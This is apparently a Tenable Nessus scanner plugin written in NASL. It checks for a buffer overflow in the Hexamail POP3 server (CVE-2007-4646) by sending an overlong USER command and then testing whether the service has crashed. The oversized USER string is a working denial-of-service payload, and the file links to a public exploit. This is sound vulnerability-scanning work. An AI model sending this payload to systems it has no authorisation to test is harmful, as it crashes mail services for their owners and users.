#
# (C) Tenable Network Security, Inc.
#


  desc = "
Synopsis :

The remote POP3 server is affected by a buffer overflow vulnerability. 

Description :

The version of Hexamail installed on the remote host is affected by a
buffer overflow in its POP3 service component that can be exploited by
an unauthenticated remote attacker to crash the service or to execute
arbitrary code on the affected host with LOCAL SYSTEM privileges. 

See also :

http://retrogod.altervista.org/hexamail_bof.html
http://www.milw0rm.com/exploits/4344

Solution :

Upgrade to Hexamail version 3.0.1.004 or later as that reportedly
resolves the issue. 

Risk factor :

Critical / CVSS Base Score : 10.0
(CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)";


if (description)
{
  script_id(26015);
  script_version("$Revision: 1.2 $");

  script_cve_id("CVE-2007-4646");
  script_bugtraq_id(25496);
  script_xref(name:"OSVDB", value:"40171");

  script_name(english:"Hexamail POP3 Buffer Overflow Vulnerability");
  script_summary(english:"Tries to crash the POP3 server");

  script_description(english:desc);

  script_category(ACT_DENIAL);
  script_family(english:"Gain root remotely");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security, Inc.");

  script_dependencies("find_service1.nasl");
  script_require_ports("Services/pop3", 110);

  exit(0);
}


include("pop3_func.inc");


port = get_kb_item("Services/pop3");
if (!port) port = 110;
if (!get_port_state(port)) exit(0);


# Make sure the banner looks like Hexamail.
banner = get_pop3_banner(port:port);
if (!banner || "+OK POP3 server ready  <" >!< banner) exit(0);


# Establish a connection.
soc = open_sock_tcp(port);
if (!soc) exit(0);

s = recv_line(socket:soc, length:1024);
if (!strlen(s) || s !~ '^\\+OK')
{
  close(soc); 
  exit(0);
}
if ("Qpopper" >< s) exit(0);


# Try to exploit the issue to crash the application.
c = string("USER ./", crap(1024));
send(socket:soc, data:string(c, "\r\n"));
s = recv_line(socket:soc, length:1024);
close(soc);


# If we didn't get a response...
if (!strlen(s))
{
  # Try to reestablish a connection and read the banner.
  soc2 = open_sock_tcp(port);
  if (soc2) 
  {
    s2 = recv_line(socket:soc2, length:1024);
    close(soc2);
  }
  else s2 = NULL;

  # If we couldn't establish the connection or read the banner,
  # there's a problem.
  if (!soc2 || !strlen(s2))
  {
    security_hole(port);
    exit(0);
  }
}
